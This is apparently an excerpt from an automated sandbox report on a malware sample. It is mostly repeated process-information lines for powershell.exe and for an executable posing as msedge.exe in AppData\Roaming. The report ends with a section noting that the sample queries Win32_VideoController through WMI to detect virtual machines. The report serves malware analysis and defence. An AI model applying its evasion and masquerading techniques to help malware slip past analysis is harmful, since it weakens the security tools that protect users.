              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\msedge.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\msedge_visual_render.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
